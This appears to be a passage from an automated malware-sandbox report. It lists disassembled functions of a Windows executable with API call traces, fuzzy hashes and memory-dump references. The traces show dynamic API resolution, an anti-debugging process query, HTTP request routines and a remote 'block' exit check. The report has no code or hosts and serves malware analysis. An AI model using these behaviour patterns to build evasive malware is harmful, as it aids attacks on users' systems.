Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
Instruction ID: d97db1a59c4db881a004fd13fa95f43a4b4e799dc382b7b3ddd968380e0460c3
Opcode Fuzzy Hash: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
Instruction Fuzzy Hash: B6F04FB1944648AFC710DF98DD45BAEBBB9FB08B21F10021AFA15A3690C7745545CBA1

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
Instruction ID: 6710e554edad90447a57410479f56be173a40300ace114c8cd68aa34356edfab
Opcode Fuzzy Hash: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
Instruction Fuzzy Hash: 17D05E74D0020CDBCB14DFE09A49ADDBB7AAB0D321F001656ED0572240DA305446CA65

Function 004195E0 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,008467B8), ref: 004195FD
GetProcAddress.KERNEL32(77190000,00846618), ref: 00419615
GetProcAddress.KERNEL32(77190000,0084D1D0), ref: 0041962E
GetProcAddress.KERNEL32(77190000,0084D290), ref: 00419646
GetProcAddress.KERNEL32(77190000,0084D248), ref: 0041965E
GetProcAddress.KERNEL32(77190000,0084D308), ref: 00419677
GetProcAddress.KERNEL32(77190000,00848F38), ref: 0041968F
GetProcAddress.KERNEL32(77190000,0084D2D8), ref: 004196A7
GetProcAddress.KERNEL32(77190000,0084D2C0), ref: 004196C0
GetProcAddress.KERNEL32(77190000,0084D2F0), ref: 004196D8
GetProcAddress.KERNEL32(77190000,0084D260), ref: 004196F0
GetProcAddress.KERNEL32(77190000,008464D8), ref: 00419709
GetProcAddress.KERNEL32(77190000,00846758), ref: 00419721
GetProcAddress.KERNEL32(77190000,00846598), ref: 00419739
GetProcAddress.KERNEL32(77190000,008464F8), ref: 00419752
GetProcAddress.KERNEL32(77190000,0084D278), ref: 0041976A
GetProcAddress.KERNEL32(77190000,0087AE50), ref: 00419782
GetProcAddress.KERNEL32(77190000,00848BA0), ref: 0041979B
GetProcAddress.KERNEL32(77190000,008465B8), ref: 004197B3
GetProcAddress.KERNEL32(77190000,0087ACE8), ref: 004197CB
GetProcAddress.KERNEL32(77190000,0087ADA8), ref: 004197E4
GetProcAddress.KERNEL32(77190000,0087AEF8), ref: 004197FC
GetProcAddress.KERNEL32(77190000,0087ACD0), ref: 00419814
GetProcAddress.KERNEL32(77190000,00846418), ref: 0041982D
GetProcAddress.KERNEL32(77190000,0087AD00), ref: 00419845
GetProcAddress.KERNEL32(77190000,0087ADC0), ref: 0041985D
GetProcAddress.KERNEL32(77190000,0087AF10), ref: 00419876
GetProcAddress.KERNEL32(77190000,0087AD48), ref: 0041988E
GetProcAddress.KERNEL32(77190000,0087AC88), ref: 004198A6
GetProcAddress.KERNEL32(77190000,0087ACA0), ref: 004198BF
GetProcAddress.KERNEL32(77190000,0087AD60), ref: 004198D7
GetProcAddress.KERNEL32(77190000,0087AF40), ref: 004198EF
GetProcAddress.KERNEL32(77190000,0087ADF0), ref: 00419908
GetProcAddress.KERNEL32(77190000,00849368), ref: 00419920
GetProcAddress.KERNEL32(77190000,0087AEB0), ref: 00419938
GetProcAddress.KERNEL32(77190000,0087AC70), ref: 00419951
GetProcAddress.KERNEL32(77190000,008465D8), ref: 00419969
GetProcAddress.KERNEL32(77190000,0087AD30), ref: 00419981
GetProcAddress.KERNEL32(77190000,00846638), ref: 0041999A
GetProcAddress.KERNEL32(77190000,0087AE08), ref: 004199B2
GetProcAddress.KERNEL32(77190000,0087AD18), ref: 004199CA
GetProcAddress.KERNEL32(77190000,00846658), ref: 004199E3
GetProcAddress.KERNEL32(77190000,00846678), ref: 004199FB
LoadLibraryA.KERNEL32(0087AD78,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A0D
LoadLibraryA.KERNEL32(0087AEE0,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A1E
LoadLibraryA.KERNEL32(0087AEC8,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A30
LoadLibraryA.KERNEL32(0087AE98,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A42
LoadLibraryA.KERNEL32(0087AF28,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A53
LoadLibraryA.KERNEL32(0087AC58,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A65
LoadLibraryA.KERNEL32(0087AE80,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A77
LoadLibraryA.KERNEL32(0087AD90,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A88
GetProcAddress.KERNEL32(77040000,008461F8), ref: 00419AAA
GetProcAddress.KERNEL32(77040000,0087AE20), ref: 00419AC2
GetProcAddress.KERNEL32(77040000,0084D4E0), ref: 00419ADA
GetProcAddress.KERNEL32(77040000,0087AE38), ref: 00419AF3
GetProcAddress.KERNEL32(77040000,00846258), ref: 00419B0B
GetProcAddress.KERNEL32(73D20000,00848D30), ref: 00419B30
GetProcAddress.KERNEL32(73D20000,00846218), ref: 00419B49
GetProcAddress.KERNEL32(73D20000,00848D58), ref: 00419B61
GetProcAddress.KERNEL32(73D20000,0087ACB8), ref: 00419B79
GetProcAddress.KERNEL32(73D20000,0087ADD8), ref: 00419B92
GetProcAddress.KERNEL32(73D20000,00846398), ref: 00419BAA
GetProcAddress.KERNEL32(73D20000,00846078), ref: 00419BC2
GetProcAddress.KERNEL32(73D20000,0087AE68), ref: 00419BDB
GetProcAddress.KERNEL32(768D0000,00846198), ref: 00419BFC
GetProcAddress.KERNEL32(768D0000,008461B8), ref: 00419C14
GetProcAddress.KERNEL32(768D0000,0087AFA0), ref: 00419C2D
GetProcAddress.KERNEL32(768D0000,0087AFB8), ref: 00419C45
GetProcAddress.KERNEL32(768D0000,008463D8), ref: 00419C5D
GetProcAddress.KERNEL32(75790000,00848BC8), ref: 00419C83
GetProcAddress.KERNEL32(75790000,00848C18), ref: 00419C9B
GetProcAddress.KERNEL32(75790000,0087AF58), ref: 00419CB3
GetProcAddress.KERNEL32(75790000,00846318), ref: 00419CCC
GetProcAddress.KERNEL32(75790000,00846158), ref: 00419CE4
GetProcAddress.KERNEL32(75790000,00848F60), ref: 00419CFC
GetProcAddress.KERNEL32(75A10000,0087B018), ref: 00419D22
GetProcAddress.KERNEL32(75A10000,00846018), ref: 00419D3A
GetProcAddress.KERNEL32(75A10000,0084D510), ref: 00419D52
GetProcAddress.KERNEL32(75A10000,0087B000), ref: 00419D6B
GetProcAddress.KERNEL32(75A10000,0087AF70), ref: 00419D83
GetProcAddress.KERNEL32(75A10000,008460B8), ref: 00419D9B
GetProcAddress.KERNEL32(75A10000,008462D8), ref: 00419DB4
GetProcAddress.KERNEL32(75A10000,0087AFD0), ref: 00419DCC
GetProcAddress.KERNEL32(75A10000,0087AF88), ref: 00419DE4
GetProcAddress.KERNEL32(76850000,008463F8), ref: 00419E06
GetProcAddress.KERNEL32(76850000,0087AFE8), ref: 00419E1E
GetProcAddress.KERNEL32(76850000,0087B168), ref: 00419E36
GetProcAddress.KERNEL32(76850000,0087B258), ref: 00419E4F
GetProcAddress.KERNEL32(76850000,0087B270), ref: 00419E67
GetProcAddress.KERNEL32(75690000,00846058), ref: 00419E88
GetProcAddress.KERNEL32(75690000,00846098), ref: 00419EA1
GetProcAddress.KERNEL32(769C0000,00846298), ref: 00419EC2
GetProcAddress.KERNEL32(769C0000,0087B138), ref: 00419EDA
GetProcAddress.KERNEL32(6F8E0000,008463B8), ref: 00419F00
GetProcAddress.KERNEL32(6F8E0000,008460D8), ref: 00419F18
GetProcAddress.KERNEL32(6F8E0000,00846238), ref: 00419F30
GetProcAddress.KERNEL32(6F8E0000,0087B0A8), ref: 00419F49
GetProcAddress.KERNEL32(6F8E0000,00846178), ref: 00419F61
GetProcAddress.KERNEL32(6F8E0000,00846338), ref: 00419F79
GetProcAddress.KERNEL32(6F8E0000,008461D8), ref: 00419F92
GetProcAddress.KERNEL32(6F8E0000,00846278), ref: 00419FAA
GetProcAddress.KERNEL32(6F8E0000,InternetSetOptionA), ref: 00419FC1
GetProcAddress.KERNEL32(6F8E0000,HttpQueryInfoA), ref: 00419FD7
GetProcAddress.KERNEL32(75D90000,0087B2A0), ref: 00419FF9
GetProcAddress.KERNEL32(75D90000,0084D520), ref: 0041A011
GetProcAddress.KERNEL32(75D90000,0087B228), ref: 0041A029
GetProcAddress.KERNEL32(75D90000,0087B2D0), ref: 0041A042
GetProcAddress.KERNEL32(76470000,00846358), ref: 0041A063
GetProcAddress.KERNEL32(6CC50000,0087B348), ref: 0041A084
GetProcAddress.KERNEL32(6CC50000,008460F8), ref: 0041A09D
GetProcAddress.KERNEL32(6CC50000,0087B318), ref: 0041A0B5
GetProcAddress.KERNEL32(6CC50000,0087B0C0), ref: 0041A0CD

Strings

InternetSetOptionA, xrefs: 00419FB5
HttpQueryInfoA, xrefs: 00419FCC

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
Instruction ID: de404ee9f47513f53d28e8016dc56f999ad60f1515a6c9981bc8237813ea7153
Opcode Fuzzy Hash: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
Instruction Fuzzy Hash: 946243B5500E00AFC774DFA8EE88D1E3BABBB8C761750A51AE609C3674D7349443DBA4

Function 00407750 Relevance: 68.1, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00415CA4,?), ref: 00407764
HeapAlloc.KERNEL32(00000000,?,00415CA4,?), ref: 0040776B
lstrcat.KERNEL32(?,00840690), ref: 0040791B
lstrcat.KERNEL32(?,?), ref: 0040792F
lstrcat.KERNEL32(?,?), ref: 00407943
lstrcat.KERNEL32(?,?), ref: 00407957
lstrcat.KERNEL32(?,0087B690), ref: 0040796B
lstrcat.KERNEL32(?,0087B810), ref: 0040797F
lstrcat.KERNEL32(?,0087B660), ref: 00407992
lstrcat.KERNEL32(?,0087B738), ref: 004079A6
lstrcat.KERNEL32(?,00842570), ref: 004079BA
lstrcat.KERNEL32(?,?), ref: 004079CE
lstrcat.KERNEL32(?,?), ref: 004079E2
lstrcat.KERNEL32(?,?), ref: 004079F6
lstrcat.KERNEL32(?,0087B690), ref: 00407A09
lstrcat.KERNEL32(?,0087B810), ref: 00407A1D
lstrcat.KERNEL32(?,0087B660), ref: 00407A31
lstrcat.KERNEL32(?,0087B738), ref: 00407A44
lstrcat.KERNEL32(?,0084B388), ref: 00407A58
lstrcat.KERNEL32(?,?), ref: 00407A6C
lstrcat.KERNEL32(?,?), ref: 00407A80
lstrcat.KERNEL32(?,?), ref: 00407A94
lstrcat.KERNEL32(?,0087B690), ref: 00407AA8
lstrcat.KERNEL32(?,0087B810), ref: 00407ABB
lstrcat.KERNEL32(?,0087B660), ref: 00407ACF
lstrcat.KERNEL32(?,0087B738), ref: 00407AE3
lstrcat.KERNEL32(?,0084B3F0), ref: 00407AF6
lstrcat.KERNEL32(?,?), ref: 00407B0A
lstrcat.KERNEL32(?,?), ref: 00407B1E
lstrcat.KERNEL32(?,?), ref: 00407B32
lstrcat.KERNEL32(?,0087B690), ref: 00407B46
lstrcat.KERNEL32(?,0087B810), ref: 00407B5A
lstrcat.KERNEL32(?,0087B660), ref: 00407B6D
lstrcat.KERNEL32(?,0087B738), ref: 00407B81
lstrcat.KERNEL32(?,0084B458), ref: 00407B95
lstrcat.KERNEL32(?,?), ref: 00407BA9
lstrcat.KERNEL32(?,?), ref: 00407BBD
lstrcat.KERNEL32(?,?), ref: 00407BD1
lstrcat.KERNEL32(?,0087B690), ref: 00407BE4
lstrcat.KERNEL32(?,0087B810), ref: 00407BF8
lstrcat.KERNEL32(?,0087B660), ref: 00407C0C
lstrcat.KERNEL32(?,0087B738), ref: 00407C1F
lstrcat.KERNEL32(?,0084B4C0), ref: 00407C33
lstrcat.KERNEL32(?,?), ref: 00407C47
lstrcat.KERNEL32(?,?), ref: 00407C5B
lstrcat.KERNEL32(?,?), ref: 00407C6F
lstrcat.KERNEL32(?,0087B690), ref: 00407C83
lstrcat.KERNEL32(?,0087B810), ref: 00407C96
lstrcat.KERNEL32(?,0087B660), ref: 00407CAA
lstrcat.KERNEL32(?,0087B738), ref: 00407CBE

Part of subcall function 00407610: lstrcat.KERNEL32(00000000,004217A0), ref: 00407646
Part of subcall function 00407610: lstrcat.KERNEL32(00000000,00000000), ref: 00407688
Part of subcall function 00407610: lstrcat.KERNEL32(00000000, : ), ref: 0040769A
Part of subcall function 00407610: lstrcat.KERNEL32(00000000,00000000), ref: 004076CF
Part of subcall function 00407610: lstrcat.KERNEL32(00000000,004217A8), ref: 004076E0
Part of subcall function 00407610: lstrcat.KERNEL32(00000000,00000000), ref: 00407713
Part of subcall function 00407610: lstrcat.KERNEL32(00000000,004217AC), ref: 0040772D
Part of subcall function 00407610: task.LIBCPMTD ref: 0040773B

lstrcat.KERNEL32(?,0084D670), ref: 00407E4B
lstrcat.KERNEL32(?,0087BB08), ref: 00407E5E
lstrlenA.KERNEL32(00000000), ref: 00407E6B
lstrlenA.KERNEL32(00000000), ref: 00407E7B

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$Heaplstrlen$AllocProcesslstrcpytask
String ID:
API String ID: 3544963262-0
Opcode ID: 8a17a8719e349256dd4de01be11e994d835c93a21083cfd6185006398b4007c1
Instruction ID: 1e9b08135f7dcdfaa8f2c2dd520ea7fbbb4c73797e410f6fed26cf7179196423
Opcode Fuzzy Hash: 8a17a8719e349256dd4de01be11e994d835c93a21083cfd6185006398b4007c1
Instruction Fuzzy Hash: 8B3264B2C00615ABCB25EBA0DC89DDE773DAB48704F444A9DF60962090EE79E7C5CF64

Function 00419270 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,0084DCD0), ref: 004192B1
GetProcAddress.KERNEL32(77190000,0084DCA0), ref: 004192CA
GetProcAddress.KERNEL32(77190000,0084DCE8), ref: 004192E2
GetProcAddress.KERNEL32(77190000,0084D158), ref: 004192FA
GetProcAddress.KERNEL32(77190000,0084D1E8), ref: 00419313
GetProcAddress.KERNEL32(77190000,008456A8), ref: 0041932B
GetProcAddress.KERNEL32(77190000,008466B8), ref: 00419343
GetProcAddress.KERNEL32(77190000,00846518), ref: 0041935C
GetProcAddress.KERNEL32(77190000,0084CF48), ref: 00419374
GetProcAddress.KERNEL32(77190000,0084D230), ref: 0041938C
GetProcAddress.KERNEL32(77190000,0084CFD8), ref: 004193A5
GetProcAddress.KERNEL32(77190000,0084CFF0), ref: 004193BD
GetProcAddress.KERNEL32(77190000,008466F8), ref: 004193D5
GetProcAddress.KERNEL32(77190000,0084D098), ref: 004193EE
GetProcAddress.KERNEL32(77190000,0084D170), ref: 00419406
GetProcAddress.KERNEL32(77190000,00846458), ref: 0041941E
GetProcAddress.KERNEL32(77190000,0084CFA8), ref: 00419437
GetProcAddress.KERNEL32(77190000,0084D128), ref: 0041944F
GetProcAddress.KERNEL32(77190000,00846538), ref: 00419467
GetProcAddress.KERNEL32(77190000,0084D200), ref: 00419480
GetProcAddress.KERNEL32(77190000,00846478), ref: 00419498
LoadLibraryA.KERNEL32(0084D0C8,?,004164A0), ref: 004194AA
LoadLibraryA.KERNEL32(0084CF90,?,004164A0), ref: 004194BB
LoadLibraryA.KERNEL32(0084D050,?,004164A0), ref: 004194CD
LoadLibraryA.KERNEL32(0084D1A0,?,004164A0), ref: 004194DF
LoadLibraryA.KERNEL32(0084D068,?,004164A0), ref: 004194F0
GetProcAddress.KERNEL32(76850000,0084D0E0), ref: 00419512
GetProcAddress.KERNEL32(77040000,0084D188), ref: 00419533
GetProcAddress.KERNEL32(77040000,0084D218), ref: 0041954B
GetProcAddress.KERNEL32(75A10000,0084D110), ref: 0041956D
GetProcAddress.KERNEL32(75690000,00846718), ref: 0041958E
GetProcAddress.KERNEL32(776F0000,008456C8), ref: 004195AF
GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 004195C6

Strings

NtQueryInformationProcess, xrefs: 004195BA
F(t, xrefs: 00419551

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: F(t$NtQueryInformationProcess
API String ID: 2238633743-4113152680
Opcode ID: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
Instruction ID: 826a308167d33dd6e89c68d84aa8ae535e40b86c028b310e96c4c1ecb1cfdbe7
Opcode Fuzzy Hash: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
Instruction Fuzzy Hash: D3A171B5500A00EFC764DF68ED88E1E3BBBBB4C361B50A51AEA05C3674D7349843DBA5

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
StrCmpCA.SHLWAPI(?,0087CDA8), ref: 0040498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DC3,00000000,?,?,00000000,?,",00000000,?,0087CD58), ref: 00404E38
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
InternetCloseHandle.WININET(00000000), ref: 00404EFD
InternetCloseHandle.WININET(00000000), ref: 00404F15
HttpOpenRequestA.WININET(00000000,0087CDC8,?,0087C3D0,00000000,00000000,00400100,00000000), ref: 00404B65

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

InternetCloseHandle.WININET(00000000), ref: 00404F1F

Strings

", xrefs: 00404C42
", xrefs: 00404D83
------, xrefs: 00404A0D
------, xrefs: 00404B78
------, xrefs: 00404CB9

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$??2@ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 594634378-2180234286
Opcode ID: a146e0bf8b2142934a1bd0f2da7d2553984d02bf862d10a5bf1b93dbe47ba6cc
Instruction ID: 96828d9d4da3c69e3e13a7d192eb2c0d5cb14303612463eff3b0a86b38ab5adb
Opcode Fuzzy Hash: a146e0bf8b2142934a1bd0f2da7d2553984d02bf862d10a5bf1b93dbe47ba6cc
Instruction Fuzzy Hash: 7B124E71912118AACB14EB91DC96FEEB339AF14314F50419EF50662091EF782F98CF6A

Function 004062D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
StrCmpCA.SHLWAPI(?,0087CDA8), ref: 00406353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
HttpOpenRequestA.WININET(00000000,GET,?,0087C3D0,00000000,00000000,00400100,00000000), ref: 004063D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
InternetCloseHandle.WININET(00000000), ref: 0040653F
InternetCloseHandle.WININET(00000000), ref: 00406549
InternetCloseHandle.WININET(00000000), ref: 00406553

Strings

GET, xrefs: 004063CC
ERROR, xrefs: 00406519
ERROR, xrefs: 00406457

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$??2@ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3871519372-2509457195
Opcode ID: 27dfb566f3f1cc70d54519dffa21decc5442ed83b698f99a2c8f6724fbb86e25
Instruction ID: cbac5eee591d607aa173065357eefb87c001816e051c1cde1c99a9b9dc38779b
Opcode Fuzzy Hash: 27dfb566f3f1cc70d54519dffa21decc5442ed83b698f99a2c8f6724fbb86e25
Instruction Fuzzy Hash: AA719F71A00218EBDB24DFA0DC49FEEB775AF44704F1080AAF50A6B1D0DBB86A85CF55

Function 004112B0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 004112D5
ExitProcess.KERNEL32 ref: 004112E1
strtok_s.MSVCRT ref: 004112F8

Strings

block, xrefs: 004112C7

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 3fdee7f59798e5a6eda10b4ee65c1839f719b60452b83b2ae77f14c871c9aaa8
Instruction ID: b2aee4bd772402993bd8daf8ed4e127407cef198cc172b88b11a84757ccddcb3
Opcode Fuzzy Hash: 3fdee7f59798e5a6eda10b4ee65c1839f719b60452b83b2ae77f14c871c9aaa8
Instruction Fuzzy Hash: 6451A574B00209EFDB14DFA0E944BEE37B5BF44B04F10804AE916A7361D778D996CB5A

Function 00414FF0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

